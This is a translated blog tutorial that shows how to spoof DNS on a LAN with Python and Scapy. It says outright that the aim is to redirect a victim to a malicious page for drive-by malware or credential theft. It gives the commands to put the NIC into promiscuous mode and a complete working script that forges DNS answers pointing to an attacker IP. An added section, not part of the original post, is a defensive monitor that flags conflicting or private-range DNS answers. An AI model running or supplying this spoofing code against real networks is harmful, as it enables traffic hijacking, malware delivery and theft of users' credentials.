Implementing DNS spoofing with Python

Suppose two people, Bob and Eve, are on the same LAN. Eve wants Bob to visit a malicious web page she created, so that she can install malware on Bob's computer through a drive-by download, or perhaps present a spoofed site to try to steal Bob's credentials.

(Image from the link provided above)

(The test environment is CentOS 6.5 throughout.)

1. Put the attacker server's NIC into promiscuous mode so that it can capture all packets on the LAN:

       ifconfig em1 promisc

  Check the interface mode: ifconfig em1

     The output shows the interface is now in promiscuous mode.


2. Write the attack code:

Open the dns_spoof.py script:

#!/usr/bin/env python
# -*- coding: utf-8 -*-

from scapy.all import *
import logging

logger = logging.getLogger('main')
logging.basicConfig(format='%(levelname)s:%(message)s', level=logging.DEBUG)
logger.setLevel(logging.DEBUG)
# Set the interface for scapy to use (it must be the interface put into promiscuous mode in step 1)
conf.iface = 'br0'
# Set the spoofed response
spoofed_ip = '192.168.28.118'

def send_response(x):
    # Get the requested domain
    req_domain = x[DNS].qd.qname
    logger.info('Found request for %s', req_domain)
    # First, we delete the existing lengths and checksums...
    # We will let Scapy re-create them
    del(x[UDP].len)
    del(x[UDP].chksum)
    del(x[IP].len)
    del(x[IP].chksum)
    # Let's build our response from a copy of the original packet
    response = x.copy()
    # The original wireless version set the 802.11 "from-DS" flag here (FCfield = 2);
    # Ethernet frames on br0 carry no such field, so that step is dropped.
    # Switch the MAC addresses
    response.src, response.dst = x.dst, x.src
    # Switch the IP addresses
    response[IP].src, response[IP].dst = x[IP].dst, x[IP].src
    # Switch the ports
    response.sport, response.dport = x.dport, x.sport
    # Set the DNS flags: this is a response, recursion available, one answer record
    response[DNS].qr = 1
    response[DNS].ra = 1
    response[DNS].ancount = 1
    # Let's add on the answer section
    response[DNS].an = DNSRR(
        rrname=req_domain,
        type='A',
        rclass='IN',
        ttl=900,
        rdata=spoofed_ip
        )
    # Now, we inject the response!
    sendp(response)
    logger.info('Sent response: %s -> %s\n', req_domain, spoofed_ip)

def main():
    logger.info('Starting to intercept [CTRL+C to stop]')
    # Only packets that actually carry a DNS layer and are addressed to UDP/53 reach send_response
    sniff(prn=send_response,
          lfilter=lambda x: x.haslayer(DNS) and x.haslayer(UDP) and x[UDP].dport == 53)

if __name__ == "__main__":
    # Make it happen!
    main()

This script captures DNS A-record queries on the LAN.
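As an added example that is not part of the original post: the script above races the real resolver rather than suppressing it, so a client on the LAN ends up with two answers for the same transaction ID, and the forged one points a public name into the local 192.168.28.0 range. The monitor below, written here for illustration, applies both of those checks to a constructed set of decoded DNS responses (the client address, the second transaction and the 203.0.113.x answers are made up; 223.5.5.5 and 192.168.28.118 are the values from the page).

```python
import ipaddress
from collections import defaultdict

# Constructed sample of decoded DNS responses seen on the client's network
# segment (not a real capture). Both answers for txid 0x1a2b claim to come
# from the resolver 223.5.5.5; the forged one arrives first, because the
# spoofing script replies the moment it sniffs the query.
OBSERVED = [
    {"src": "223.5.5.5", "dst": "192.168.28.50", "txid": 0x1a2b,
     "qname": "www.baidu.com.", "rdata": "192.168.28.118", "ttl": 900},
    {"src": "223.5.5.5", "dst": "192.168.28.50", "txid": 0x1a2b,
     "qname": "www.baidu.com.", "rdata": "203.0.113.10", "ttl": 60},
    {"src": "223.5.5.5", "dst": "192.168.28.50", "txid": 0x3c4d,
     "qname": "mirrors.example.net.", "rdata": "203.0.113.44", "ttl": 300},
]

RFC1918 = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
LOCAL_ZONES = (".local.", ".lan.")  # assumed internal zones that may legitimately resolve to RFC 1918 space

def is_rfc1918(ip):
    """True for addresses inside the three RFC 1918 private ranges."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in RFC1918)

def detect_conflicts(responses):
    """Group responses by (client, txid, qname) and report every transaction that
    received more than one distinct A answer. The earliest answer is listed as the
    suspect, because a spoofer on the LAN answers before the real resolver can."""
    by_txn = defaultdict(list)
    for r in responses:
        by_txn[(r["dst"], r["txid"], r["qname"])].append(r["rdata"])
    alerts = []
    for (client, txid, qname), answers in by_txn.items():
        if len(set(answers)) > 1:
            alerts.append({"client": client, "txid": txid, "qname": qname,
                           "first_answer": answers[0], "later_answers": answers[1:]})
    return alerts

def private_answer_for_public_name(response):
    """Flag a public name resolving into RFC 1918 space, as the forged
    192.168.28.118 answer does; names in LOCAL_ZONES are exempt."""
    return is_rfc1918(response["rdata"]) and not response["qname"].endswith(LOCAL_ZONES)

def analyze(responses):
    """Run both checks and return the combined list of (kind, detail) findings."""
    findings = [("conflicting-answers", a) for a in detect_conflicts(responses)]
    findings += [("private-answer", r) for r in responses if private_answer_for_public_name(r)]
    return findings

if __name__ == "__main__":
    for kind, detail in analyze(OBSERVED):
        print(kind, detail)
```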

3. Demo (for convenience, the local DNS server was set to 223.5.5.5):

Testing with the command dig @223.5.5.5 www.baidu.com gives the following:

This article borrows the approach from http://jordan-wright.com/blog/2013/11/15/wireless-attacks-with-python-part-one-the-airpwn-attack/; the script there does not work as-is, so some adjustments were made, and the experiment succeeded in a LAN environment.

Translation link: http://www.oschina.net/translate/wireless-attacks-with-python-part-one-the-airpwn-attack


posted on 2016-04-18 16:51 by guoqp